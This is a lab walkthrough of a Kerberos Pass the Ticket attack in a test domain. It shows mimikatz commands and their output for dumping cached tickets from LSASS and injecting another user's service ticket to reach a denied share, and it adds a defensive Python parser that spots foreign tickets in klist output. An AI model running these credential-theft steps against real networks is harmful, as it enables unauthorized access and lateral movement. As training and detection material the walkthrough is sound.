Pass The Ticket

Recap

Kerberos authentication is built around tickets issued by the Ticket Granting Service (TGS). The Pass the Ticket attack abuses a TGS (service) ticket, which can be exported from one session and re-injected elsewhere on the network to authenticate to the specific service it was issued for.

In this scenario we abuse an already existing service ticket of the user "dave" that is cached on a host in the network. We will export the ticket with mimikatz and inject it into the session of our current user, "Jen", to access files that only dave's permissions allow.

Attack

To demonstrate the attack angle, we are going to extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our own session. This will allow us to access the restricted folder.

Verify Jen does not have Access

We can verify that Jen does not have access to the following folder:

PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
At line:1 char:1
+ ls \\web04\backup
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\web04\backup:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

Launch Mimikatz

This command parses the LSASS process memory for any cached TGT/TGS and saves each one to disk in mimikatz's kirbi format.

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::tickets /export

Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session           : Batch from 0
User Name         : dave
Domain            : CORP
Logon Server      : DC1
Logon Time        : 9/14/2022 6:24:17 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1103

         * Username : dave
         * Domain   : CORP.COM
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Target Name  (02) : krbtgt ; CORP ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
           Flags 40c10000    : name_canonicalize ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1f1626][email protected] !
...

Verify Generated Tickets

We can verify the newly exported tickets by listing the files with the *.kirbi extension:

PS C:\Tools> dir *.kirbi


    Directory: C:\Tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;12bd0][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c6860][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c6860][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c933d][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c933d][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2][email protected]
...

Selecting TGS Ticket

Many tickets have been exported. We select the one for dave's cifs/web04 service and inject it through mimikatz:

mimikatz # kerberos::ptt [0;12bd0][email protected]

* File: '[0;12bd0][email protected]': OK

Verifying Ticket Injection in Session

Let's verify that the ticket has been injected into our session by running "klist":

PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
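The klist output above is also the simplest host-side indicator of this attack: the session belongs to jen (per whoami), yet the cached ticket's Client principal is dave. The following Python parser, an added defender-side example that is not part of the original walkthrough, reads klist output, decodes the Ticket Flags bitmask, and reports tickets whose client principal differs from the session owner. The sample output is a constructed copy of the listing above, and the flag bit values follow the Kerberos TicketFlags definition plus the Windows name_canonicalize bit.

```python
import re
from dataclasses import dataclass

# Ticket flag bits as printed by klist: RFC 4120 TicketFlags plus the
# Windows-specific name_canonicalize bit (0x00010000).
TICKET_FLAGS = {
    0x40000000: "forwardable",
    0x20000000: "forwarded",
    0x10000000: "proxiable",
    0x08000000: "proxy",
    0x00800000: "renewable",
    0x00400000: "initial",
    0x00200000: "pre_authent",
    0x00040000: "ok_as_delegate",
    0x00010000: "name_canonicalize",
}

@dataclass
class CachedTicket:
    client: str   # e.g. "dave @ CORP.COM"
    server: str   # e.g. "cifs/web04 @ CORP.COM"
    flags: int

def decode_flags(flags: int) -> list:
    """Names of the flag bits set in a klist 'Ticket Flags' value, high bit first."""
    return [name for bit, name in sorted(TICKET_FLAGS.items(), reverse=True) if flags & bit]

def parse_klist(output: str) -> list:
    """Parse every '#N>' ticket block of klist output into CachedTicket records."""
    tickets = []
    for block in re.split(r"^#\d+>", output, flags=re.MULTILINE)[1:]:
        client = re.search(r"Client:\s*(\S+ @ \S+)", block)
        server = re.search(r"Server:\s*(\S+ @ \S+)", block)
        flags = re.search(r"Ticket Flags (0x[0-9a-fA-F]+)", block)
        if not (client and server and flags):
            continue  # skip a block klist printed incompletely
        tickets.append(CachedTicket(client.group(1), server.group(1), int(flags.group(1), 16)))
    return tickets

def foreign_tickets(output: str, session_user: str) -> list:
    """Cached tickets whose client principal is not the session owner (DOMAIN\\user or user)."""
    user = session_user.split("\\")[-1].lower()
    return [t for t in parse_klist(output) if t.client.split(" @ ")[0].lower() != user]

# Constructed sample, copied from the klist listing in this walkthrough.
SAMPLE_KLIST = """Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
"""
```

Running `foreign_tickets(SAMPLE_KLIST, "corp\\jen")` returns the cifs/web04 ticket for dave, while the same call for "corp\\dave" returns nothing.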

Confirming Success

Let's confirm that we've successfully completed the attack by trying to access the folder we initially didn't have permissions for:

PS C:\Tools> ls \\web04\backup


    Directory: \\web04\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt
